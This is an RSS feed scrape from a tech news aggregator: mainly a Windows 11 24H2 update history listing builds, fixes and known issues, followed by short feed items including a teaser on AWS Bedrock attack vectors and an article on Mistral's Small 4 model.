<h3 class="wp-block-heading">KB5060829 (OS Build 26100.4484) Preview</h3>



<p><strong>Release date:</strong> June 26, 2025</p>



<p>A wide variety of new features are being gradually rolled out in this build, including a new Settings home page that includes enterprise-specific device info cards for commercial customers on PCs managed by an IT administrator. The taskbar also now resizes icons to fit more apps when space runs low.</p>



<p>Users in the European Economic Area will see several small changes related to default browsers, such as mapping additional file and link types to the default browser and pinning it to the taskbar and Start menu.</p>



<p>A variety of bugs have also been fixed, including one that prevented the automatic renewal of expiring certificates in Windows Hello for Business.</p>



<p>There is one known issue in this build, in which blurry or unclear CJK (Chinese, Japanese, Korean) text appears when displayed at 96 DPI (100% scaling) in Chromium-based browsers such as Microsoft Edge and Google Chrome. </p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/june-26-2025-kb5060829-os-build-26100-4484-preview-e31ba7c2-ff65-4863-a462-a66e30840b1a" target="_blank" rel="noreferrer noopener">KB5060829 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5063060 (OS Build 26100.4351) Out-of-band</h3>



<p><strong>Release date:</strong> June 11, 2025</p>



<p>This out-of-band update replaces the KB5060842 Patch Tuesday release, fixing a bug in which Windows sometimes restarted unexpectedly when users opened games that use the <a href="https://www.easy.ac/en-US" target="_blank" rel="noreferrer noopener">Easy Anti-Cheat</a> service. Easy Anti-Cheat automatically installs with certain games to enhance security and prevent cheating in multiplayer online PC games. </p>



<p>Note: In this build there are reports of blurry or unclear CJK (Chinese, Japanese, Korean) text when displayed at 96 DPI (100% scaling) in Chromium-based browsers such as Microsoft Edge and Google Chrome. The issue is due to limited pixel density at 96 DPI, which can reduce the clarity and alignment of CJK characters. Increasing the display scaling improves clarity by enhancing text rendering.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/june-11-2025-kb5063060-os-build-26100-4351-out-of-band-b1746442-8c6c-425d-ac5a-3a8f51e372f3" target="_blank" rel="noreferrer noopener">KB5063060 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5060842 (OS Build 26100.4349)</h3>



<p><strong>Release date:</strong> June 10, 2025</p>



<p>After installing this update, Windows will retain system restore points for 60 days only. Restore points older than 60 days are not available. This 60-day limit will also apply to future versions of Windows 11, version 24H2.</p>



<p>The build fixes a bug that prevented users from signing in with self-signed certificates when using Windows Hello for Business with the Key Trust model.​​​​​​​ It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jun" target="_blank" rel="noreferrer noopener">June 2025 Security Updates</a>.</p>



<p>Note: In this build there are reports of blurry or unclear CJK (Chinese, Japanese, Korean) text when displayed at 96 DPI (100% scaling) in Chromium-based browsers such as Microsoft Edge and Google Chrome. The issue is due to limited pixel density at 96 DPI, which can reduce the clarity and alignment of CJK characters. Increasing the display scaling improves clarity by enhancing text rendering.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/june-10-2025-kb5060842-os-build-26100-4349-47ff300b-2a04-440c-9476-2860d04fce8d" target="_blank" rel="noreferrer noopener">KB5060842</a>.)</p>



<h3 class="wp-block-heading">KB5058499 (OS Build 26100.4202) Preview</h3>



<p><strong>Release date:</strong> May 27, 2025</p>



<p>A wide variety of new features are being gradually rolled out in this build, including one in which Click to Do gets the new Ask Copilot action. When you highlight text or an image, Click to Do offers the Ask Copilot option. Selecting it opens <a href="https://www.computerworld.com/article/1611598/microsoft-copilot-tips-how-to-use-copilot-right.html?utm=hybrid_search">Microsoft Copilot</a> with your content in the prompt box. You can send the selected text or image directly to the Copilot app to complete your prompt.</p>



<p>A variety of bugs have also been fixed, including one in which devices with BitLocker on removable drives could encounter a blue screen error after resuming from sleep or hybrid-booting.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/may-28-2025-kb5058499-os-build-26100-4202-preview-d4c2f1ee-8138-4038-b705-546945076f92" target="_blank" rel="noreferrer noopener">KB5058499 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5061977 (OS Build 26100.4066) </h3>



<p><strong>Release date:</strong> May 27, 2025</p>



<p>This out-of-band update fixes a bug in the direct send path for a guest physical address (GPA). This issue caused confidential virtual machines running on Hyper-V with Windows Server 2022 to intermittently stop responding or restart unexpectedly. As a result, service availability was affected, and manual intervention was required. This problem primarily impacted <a href="https://learn.microsoft.com/azure/confidential-computing/confidential-vm-overview" target="_blank" rel="noreferrer noopener">Azure confidential VMs</a>.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/may-27-2025-kb5061977-os-build-26100-4066-out-of-band-a15fd6bb-313a-4a24-9e35-21dbcad2aa99" target="_blank" rel="noreferrer noopener">KB5061977</a>.)</p>



<h3 class="wp-block-heading">KB5058411 (OS Build 26100.4061)</h3>



<p><strong>Release date:</strong> May 13, 2025</p>



<p>This update fixes two bugs, one in which your microphone might have muted unexpectedly, and the other in which the eye controller app didn’t launch. It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-May" target="_blank" rel="noreferrer noopener">May 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/may-13-2025-kb5058411-os-build-26100-4061-356568c2-c730-469e-819d-b680d43b1265" target="_blank" rel="noreferrer noopener">KB5058411</a>.)</p>



<h3 class="wp-block-heading">KB5055627 (OS Build 26100.3915) Preview</h3>



<p><strong>Release date:</strong> April 25, 2025</p>



<p>This build gradually rolls out several new features for Copilot+ PCs, including a <a href="https://support.microsoft.com/en-us/windows/retrace-your-steps-with-recall-aa03f8a0-a78b-4b3e-b0a1-2eb8ac48701c" target="_blank" rel="noreferrer noopener">preview of Windows Recall</a>. When you opt in, Recall takes snapshots of your activity so you can quickly find and go back to what you have seen before on your PC. With it, you can use a timeline to find the content you remember seeing.</p>



<p>Copilot+ PCs also get a new natural-language Windows search in which you can search for anything on your PC without having to remember specific file names, exact words in file content, or settings names. Just describe what you’re looking for. On Copilot+ PCs, you can also more easily find photos stored and saved in the cloud by typing your own words (like “summer picnics”) in the search box at the upper-right corner of File Explorer. </p>



<p>All PCs get a number of new features, including speech recap, in which you can keep track of what Narrator has spoken and access it for quick reference. With speech recap, you can quickly access spoken content, follow along with live transcription, and copy what Narrator last said <a href="https://support.microsoft.com/en-us/windows/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a" target="_blank" rel="noreferrer noopener">using keyboard shortcuts</a>.</p>



<p>A variety of bugs are being fixed, including one in which some devices experienced intermittent internet connections when resuming from sleep mode. Several AI components have also been updated.</p>



<p>There are two known issues in this build, including one in which players on Arm devices are unable to download and play Roblox from the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/april-25-2025-kb5055627-os-build-26100-3915-preview-9324a361-965a-4496-8fd8-ba8a9de9fc38" target="_blank" rel="noreferrer noopener">KB5055627 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5055523 (OS Build 26100.3775)</h3>



<p><strong>Release date:</strong> April 8, 2025</p>



<p>This update includes a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Apr" target="_blank" rel="noreferrer noopener">April 2025 Security Updates</a>. </p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>There are two known issues in this build, including one in which players on Arm devices are unable to download and play Roblox via the Microsoft Store on Windows. </p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/april-8-2025-kb5055523-os-build-26100-3775-277a9d11-6ebf-410c-99f7-8c61957461eb" target="_blank" rel="noreferrer noopener">KB5055523</a>.)</p>



<h3 class="wp-block-heading">KB5053656 (OS Build 26100.3624) Preview</h3>



<p><strong>Release date:</strong> March 27, 2025</p>



<p>This build gradually rolls out several new features for Snapdragon-powered Copilot+ PCs, including one in which you can search for anything on your PC without having to remember specific file names, exact words in file content, or settings names. Just describe what you’re looking for.</p>



<p>On Copilot+ PCs you can also more easily find photos stored and saved in the cloud by typing your own words (like “summer picnics”) in the search box at the upper-right corner of File Explorer. In addition to photos stored locally on your Copilot+ PC, photos from the cloud will now show up in the search results together. </p>



<p>Snapdragon-powered Copilot+ PCs also will allow you to use natural-language processing in voice access, by using your own words rather than using rigid, predefined commands.</p>



<p>In addition, the build includes a variety of bugs being immediately fixed, including one in which some third-party apps rendered the graphics settings page unresponsive.</p>



<p>There are two known issues in this build, including one in which players on Arm devices are unable to download and play Roblox from the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/march-27-2025-kb5053656-os-build-26100-3624-preview-4c35f1c4-1ae6-41ef-a317-3d8ee2e73975" target="_blank" rel="noreferrer noopener">KB5053656 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5053598 (OS Build 26100.3476)</h3>



<p><strong>Release date:</strong> March 11, 2025</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar" target="_blank" rel="noreferrer noopener">March 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>There are two known issues in this build, including one in which players on Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/march-11-2025-kb5053598-os-build-26100-3476-a248e951-daef-43ad-aa10-0b99f551cec2" target="_blank" rel="noreferrer noopener">KB5053598</a>.)</p>



<h3 class="wp-block-heading">KB5052093 (OS Build 26100.3323) Preview</h3>



<p><strong>Release date:</strong> February 25, 2025</p>



<p>In this build, a variety of new features are being rolled out gradually, including one that lets you snooze or turn off the “Start backup” reminder in the File Explorer address bar. This only applies if you are not already backing up your files and folder. To view this new option, right-click <em>Start backup</em>.</p>



<p>A number of bug fixes are being rolled out gradually, including one for a bug in which the address bar overlapped files in File Explorer when you used the F11 full-screen mode. A variety of bug fixes take immediate effect, including for a bug in which there were display rendering issues when you tried to connect to certain PCs.</p>



<p>There are two known issues in this build, including one in which Arm devices are unable to download and play Roblox via the Microsoft Store on Windows. In addition, devices that have certain Citrix components installed might be unable to complete installation of the January 2025 Windows security update. This issue was observed on devices with <a href="https://docs.citrix.com/en-us/session-recording/current-release/install-upgrade-uninstall.html" target="_blank" rel="noreferrer noopener">Citrix Session Recording Agent (SRA)</a> version 2411.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/february-25-2025-kb5052093-os-build-26100-3323-preview-053856ea-f984-4bdb-866c-5f356f5a451b" target="_blank" rel="noreferrer noopener">KB5052093 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5051987 (OS Build 26100.3194)</h3>



<p><strong>Release date:</strong> February 11, 2025</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Feb" target="_blank" rel="noreferrer noopener">February 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>There are three known issues in this build, including one in which players on Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/february-11-2025-kb5051987-os-build-26100-3194-63fb007d-3f52-4b47-85ea-28414a24be2d" target="_blank" rel="noreferrer noopener">KB5051987</a>.)</p>



<h3 class="wp-block-heading">KB5050094 (OS Build 26100.3037) Preview</h3>



<p><strong>Release date:</strong> January 28, 2025</p>



<p>In this build, a variety of new features are being rolled out gradually, including one in which an icon will appear in the system tray when you use an app that supports <a href="https://learn.microsoft.com/windows/ai/studio-effects/" target="_blank" rel="noreferrer noopener">Windows Studio Effects</a>. This only occurs on a device that has a neural processing unit (NPU). Select the icon to open the Studio Effects page in Quick Settings. To view the app that is using the camera, hover over the icon for a tooltip.</p>



<p>A number of bug fixes are being rolled out gradually, including one for a bug in which a search would sometimes repeat when you didn’t want it to. Other bug fixes are immediately available, including one in which the display of some games appears oversaturated when you use Auto HDR.</p>



<p>There are three known issues in this build, including one in which Arm devices are unable to download and play Roblox via the Microsoft Store on Windows. In addition, following the installation of the October 2024 security update, some customers report that the OpenSSH (Open Secure Shell) service fails to start, preventing SSH connections. And devices that have certain Citrix components installed might be unable to complete installation of the January 2025 Windows security update</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/january-28-2025-kb5050094-os-build-26100-3037-preview-78fda0ea-79e9-468d-8a77-de7914ca1aef" target="_blank" rel="noreferrer noopener">KB5050094 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5050009 (OS Build 26100.2894)</h3>



<p><strong>Release date:</strong> January 14, 2025</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan" target="_blank" rel="noreferrer noopener">January 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>There are three known issues in this build, including one in which players on Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/january-14-2025-kb5050009-os-build-26100-2894-bdbfb097-ea20-487d-9171-718d15e26f1b" target="_blank" rel="noreferrer noopener">KB5050009</a>.)</p>



<h3 class="wp-block-heading">KB5048667 (OS Build 26100.2605)</h3>



<p><strong>Release date:</strong> December 10, 2024</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec" target="_blank" rel="noreferrer noopener">December 2024 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>There is one known issue in this build, in which players on Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/december-10-2024-kb5048667-os-build-26100-2605-708755a6-d809-4a8a-8d20-53c4108590e6" target="_blank" rel="noreferrer noopener">KB5048667</a>.)</p>



<h3 class="wp-block-heading">KB5046740 (OS Build 26100.2454) Preview</h3>



<p><strong>Release date:</strong> November 21, 2024</p>



<p>This build adds a number of interface features are being rolled out gradually. The system tray shows a shortened date and time, and there’s a new section for touchscreen edge gestures in Settings. When you right-click an app on the Start menu, a jump list will appear (if the app has a jump list). And if you hold Ctrl + Shift down when you click a jump list item, you open the item as an admin.</p>



<p>A variety of bugs have been fixed in this build, including one in which the users page might have caused Task Manager to stop responding when you use the keyboard.</p>



<p>There is one known issue in this build, in which Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/november-21-2024-kb5046740-os-build-26100-2454-preview-2040f716-b719-482a-8aff-f7f02c79b147" target="_blank" rel="noreferrer noopener">KB5046740 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5046617 (OS Build 26100.2314)</h3>



<p><strong>Release date:</strong> November 12, 2024</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov" target="_blank" rel="noreferrer noopener">November 2024 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/november-12-2024-kb5046617-os-build-26100-2314-1fa61a6d-a99a-47ca-a169-6974f08c3a0b" target="_blank" rel="noreferrer noopener">KB5046617</a>.)</p>



<h3 class="wp-block-heading">KB5044384 (OS Build 26100.2161) Preview</h3>



<p><strong>Release date:</strong> October 24, 2024</p>



<p>In this build, you can now configure the <a href="https://blogs.windows.com/windowsexperience/2024/01/04/introducing-a-new-copilot-key-to-kick-off-the-year-of-ai-powered-windows-pcs/" target="_blank" rel="noreferrer noopener">Copilot key</a> on the keyboard. On new devices, the key opens the Copilot app. If you sign in to your account using a Microsoft Entra ID, the key opens the M365 app. You can make the key open a different app or open Search. To do this, go to <em>Settings &gt; Personalization &gt; Text input</em>. </p>



<p>In addition, a variety of features are being rolled out gradually, including one in which you can stop the suggestions to turn off notifications from certain apps. Select the ellipsis (…) in the notification and turn it off. You can also go to <em>Settings &gt; System &gt; Notifications</em> and turn it off from there. </p>



<p>A variety of bugs have also been fixed, including one in which you were unable to view some parts of the UI when you run certain apps.</p>



<p>There is one known issue in this build, in which Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/october-24-2024-kb5044384-os-build-26100-2161-preview-5a4ac390-7c7b-4f7f-81c2-c2b329ac86ab" target="_blank" rel="noreferrer noopener">KB5044384 Preview</a>.)</p>



<h3 class="wp-block-heading">Windows 11 24H2 KB5044284 (OS Build 26100.2033)</h3>



<p><strong>Release date:</strong> October 8, 2024</p>



<p>This update has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct" target="_blank" rel="noreferrer noopener">October 2024 Security Updates</a>.</p>



<p>This build also fixes one bug in which the Remote Desktop Gateway Service stopped responding when a service used remote procedure calls (RPC) over HTTP.</p>



<p>There is one known issue in this build, in which Arm devices are unable to download and play Roblox via the Microsoft Store on Windows.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/october-8-2024-kb5044284-os-build-26100-2033-6baf4a06-9763-4d9b-ba8a-f25ba6ed477b" target="_blank" rel="noreferrer noopener">KB5044284</a>.)</p>



<h2 class="wp-block-heading">Windows 11, version 24H2</h2>



<p><strong>Release date:</strong> October 1, 2024</p>



<p>The <a href="https://support.microsoft.com/en-us/topic/windows-11-version-24h2-update-history-0929c747-1815-4543-8461-0160d16f15e5" target="_blank" rel="noreferrer noopener">Windows 11 24H2 update</a> (also called <a href="https://www.computerworld.com/article/1615648/windows-11-arrives-my-initial-impressions.html">Windows 11 2024 Update</a>) is now being <a href="https://www.computerworld.com/article/1615035/microsoft-to-launch-windows-11-on-oct-5-rollout-to-last-into-22.html">gradually rolled out</a>. It may take some months before it reaches everyone, so you may not have it yet. As with previous annual Windows updates, it’s not a major upgrade, but does include a variety of minor new features.</p>



<p>Following are the highlights for end users:</p>



<ul class="wp-block-list">
<li>File Explorer gets several new features, including support for TAR and 7z compression and the ability to add metadata to PNG files, so you can add information to your images.</li>



<li>New privacy settings for Wi-Fi networks give more control over which applications can access the list of nearby Wi-Fi networks. Limiting the applications that can access that list can make it more difficult for others to pinpoint your location.</li>



<li>You can now join Wi-Fi networks by scanning QR codes, and create a QR code to allow others to share your mobile hotspot with others.</li>



<li>A new Energy Saver mode reduces electric consumption on desktop PCs as well as laptops, helping you reduce your carbon footprint and improving laptop battery life. It reduces energy consumption from background tasks as well as those running in the foreground.</li>



<li>Copilot now runs as a separate app, and is movable and resizable like any other app, rather than running in a sidebar panel.</li>



<li>Copilot+ PCs get several new features, including Cocreator in Paint, which uses AI to generate images; enhancing video calls with AI-powered noise cancellation and improved lighting; and what Microsoft calls Auto Super Resolution, which gives games higher resolution and offers smoother gameplay.</li>
</ul>



<p>For <a href="https://www.computerworld.com/article/1613390/microsoft-hands-it-admins-beefed-up-windows-release-health-hub.html">IT admins</a>, highlights include:</p>



<ul class="wp-block-list">
<li>Policy improvements and automatic account management for Windows Local Administrator Password Solution (LAPS)</li>



<li>Personal Data Encryption (PDE) for users’ Documents, Desktop, and Pictures folders</li>



<li>App Control for Business</li>



<li>Windows protected print mode</li>



<li>Local Security Authority (LSA) protection</li>



<li>Support for Wi-Fi 7</li>



<li>SHA-3 support</li>
</ul>



<p>See this <a href="https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-11-version-24h2-what-s-new-for-it-pros/ba-p/4259108" target="_blank" rel="noreferrer noopener">blog post</a> from Microsoft’s Harjit Dhaliwal for more information.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Found Eight Attack Vectors Inside AWS Bedrock. Here’s What Attackers Can Do with Them]]></title>
<description><![CDATA[AWS Bedrock is Amazon’s platform for building AI-powered applications. It gives developers access to foundation models and the tools to connect those models directly to enterprise data and systems. That connectivity is what makes it powerful – but it’s also…
Read more →
The post We Found Eight At...]]></description>
<link>https://tsecurity.de/de/3373731/it-security-nachrichten/we-found-eight-attack-vectors-inside-aws-bedrock-heres-what-attackers-can-do-with-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3373731/it-security-nachrichten/we-found-eight-attack-vectors-inside-aws-bedrock-heres-what-attackers-can-do-with-them/</guid>
<pubDate>Mon, 23 Mar 2026 14:41:04 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AWS Bedrock is Amazon’s platform for building AI-powered applications. It gives developers access to foundation models and the tools to connect those models directly to enterprise data and systems. That connectivity is what makes it powerful – but it’s also…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/we-found-eight-attack-vectors-inside-aws-bedrock-heres-what-attackers-can-do-with-them/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/we-found-eight-attack-vectors-inside-aws-bedrock-heres-what-attackers-can-do-with-them/">We Found Eight Attack Vectors Inside AWS Bedrock. Here’s What Attackers Can Do with Them</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Software engineers, you’re measuring the wrong things. Here’s what actually matters.(Podcast)]]></title>
<description><![CDATA[What are you doing is wrong! Most engineering teams are tracking effort and calling it progress. Story points, commit frequency, PR cycle time, items from a Definitions of Done implemented or respected  — these are process metrics dressed up as…
Read more →
The post Software engineers, you’re mea...]]></description>
<link>https://tsecurity.de/de/3369735/it-security-nachrichten/software-engineers-youre-measuring-the-wrong-things-heres-what-actually-matterspodcast/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3369735/it-security-nachrichten/software-engineers-youre-measuring-the-wrong-things-heres-what-actually-matterspodcast/</guid>
<pubDate>Sat, 21 Mar 2026 23:18:55 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What are you doing is wrong! Most engineering teams are tracking effort and calling it progress. Story points, commit frequency, PR cycle time, items from a Definitions of Done implemented or respected  — these are process metrics dressed up as…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/software-engineers-youre-measuring-the-wrong-things-heres-what-actually-matters-podcast/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/software-engineers-youre-measuring-the-wrong-things-heres-what-actually-matters-podcast/">Software engineers, you’re measuring the wrong things. Here’s what actually matters.(Podcast)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mistral's Small 4 consolidates reasoning, vision and coding into one model — at a fraction of the inference cost]]></title>
<description><![CDATA[Enterprises that have been juggling separate models for reasoning, multimodal tasks, and agentic coding may be able to simplify their stack: Mistral’s new Small 4 brings all three into a single open-source model, with adjustable reasoning levels under the hood.Small 4 enters a crowded field of sm...]]></description>
<link>https://tsecurity.de/de/3367948/it-nachrichten/mistrals-small-4-consolidates-reasoning-vision-and-coding-into-one-model-at-a-fraction-of-the-inference-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367948/it-nachrichten/mistrals-small-4-consolidates-reasoning-vision-and-coding-into-one-model-at-a-fraction-of-the-inference-cost/</guid>
<pubDate>Fri, 20 Mar 2026 21:16:38 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises that have been juggling separate models for reasoning, multimodal tasks, and agentic coding may be able to simplify their stack: Mistral’s new Small 4 brings all three into a single open-source model, with adjustable reasoning levels under the hood.</p><p>Small 4 enters a crowded field of small models — including <a href="https://venturebeat.com/technology/alibabas-new-open-source-qwen3-5-medium-models-offer-sonnet-4-5-performance">Qwen</a> and <a href="https://venturebeat.com/ai/anthropic-releases-claude-3-haiku-an-ai-model-built-for-speed-and-affordability">Claude Haiku</a> — that are competing on inference cost and benchmark performance. Mistral’s pitch: shorter outputs that translate to lower latency and cheaper tokens.</p><p>Mistral Small 4 updates <a href="https://venturebeat.com/business/mistral-just-updated-its-open-source-small-model-from-3-1-to-3-2-heres-why">Mistral Small 3.2, which came out in June 2025,</a> and is available under an Apache 2.0 license. “With Small 4, users no longer need to choose between a fast instruct model, a powerful reasoning engine, or a multimodal assistant: one model now delivers all three, with configurable reasoning effort and best-in-class efficiency,” Mistral said in <a href="https://mistral.ai/news/mistral-small-4">a blog post</a>.</p><p>The company said that despite its smaller size — Mistral Small 4 has 119 billion total parameters with only 6 billion active parameters per token — the model combines the capabilities of all Mistral’s models. It has the reasoning capabilities of Magistral, the multimodal understanding of Pixtral, and the agentic coding performance of Devstral. It also has a 256K context window that the company said works well for long-form conversations and analysis.</p><p>Rob May, co-founder and CEO of the small language model marketplace Neurometric, told VentureBeat that Mistral Small 4 stands out for its architectural flexibility. However, it joins a rising number of smaller models that he said risks adding more fragmentation to the market. </p><p>"From a technical perspective, yes, it can be competitive against other models,” May said. “The bigger issue is that it has to overcome market confusion. Mistral has to win the mindshare to get a shot at being part of that test set first.  Only then can they show the technical capabilities of the model.”</p><h2>Reasoning on demand</h2><p>Small models still offer <a href="https://venturebeat.com/ai/model-minimalism-the-new-ai-strategy-saving-companies-millions">good options</a> for enterprise builders looking to have the same LLM experience at a lower cost. </p><p>The model is built on a mixture-of-experts architecture, much like other Mistral models. It features 128 experts with four active each token, which Mistral says enables efficient scaling and specialization.</p><p>This allows Mistral Small 4 to respond faster, even to more reasoning-intensive outputs. It can also process and reason about text and images, allowing users to parse documents and graphs. </p><p>Mistral said the model features a new parameter it calls reasoning_effort, which would allow users to “dynamically adjust the model’s behavior.” Enterprises would be able to configure Small 4 to deliver fast, lightweight responses in the same style as Mistral Small 3.2, or make it wordier in the vein of Magistral, providing step-by-step reasoning for complex tasks, according to Mistral. </p><p>Mistral said Small 4 runs on fewer chips than comparable models, with a recommended setup of four Nvidia HGX H100s or H200s, or two Nvidia DGX B200s.</p><p>“Delivering advanced open-source AI models requires broad optimization. Through close collaboration with Nvidia, inference has been optimized for both open source vLLM and SGLang, ensuring efficient, high-throughput serving across deployment scenarios,” Mistral said.</p><h2>Benchmark performances</h2><p>According to Mistral's benchmarks, Small 4 performs close to the level of Mistral Medium 3.1 and Mistral Large 3, particularly in MMLU Pro.</p><p>Mistral said the instruction-following performance makes Small 4 suited for high-volume enterprise tasks such as document understanding.</p><p>While competitive with other small models from other companies, Small 4 still performs below other popular open-source models, especially in reasoning-intensive tasks. <!-- -->Qwen 3.5 122B and Qwen 3-next 80B outperform Small 4 on LiveCodeBench, as does Claude Haiku in instruct mode.</p><p>Mistral Small 4 was able to beat OpenAI’s GPT-OSS 120B in the LCR. </p><p>Mistral argues that Small 4 achieves these scores with “significantly shorter outputs” that translate to lower inference costs and latency than the other models. In instruct mode specifically, Small 4 produces the shortest outputs of any model tested — 2.1K characters vs. 14.2K for Claude Haiku and 23.6K for GPT-OSS 120B. In reasoning mode, outputs are much longer (18.7K), which is expected for that use case. </p><p>May said that while model choice depends on an organization’s goals, latency is one of the three pillars they should prioritize. “It depends on your goals and what you are optimizing your architecture to accomplish. Enterprises should prioritize these three pillars: reliability and structured output, latency to intelligence ratio, fine-tunability and privacy,” May said. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s How Microsoft Plans to Improve Windows 11’s Performance and Reliability in 2026]]></title>
<description><![CDATA[Microsoft detailed today how it plans to improve the performance and reliability of Windows 11 throughout 2026.
The post Here’s How Microsoft Plans to Improve Windows 11’s Performance and Reliability in 2026 appeared first on Thurrott.com.]]></description>
<link>https://tsecurity.de/de/3367907/windows-tipps/heres-how-microsoft-plans-to-improve-windows-11s-performance-and-reliability-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367907/windows-tipps/heres-how-microsoft-plans-to-improve-windows-11s-performance-and-reliability-in-2026/</guid>
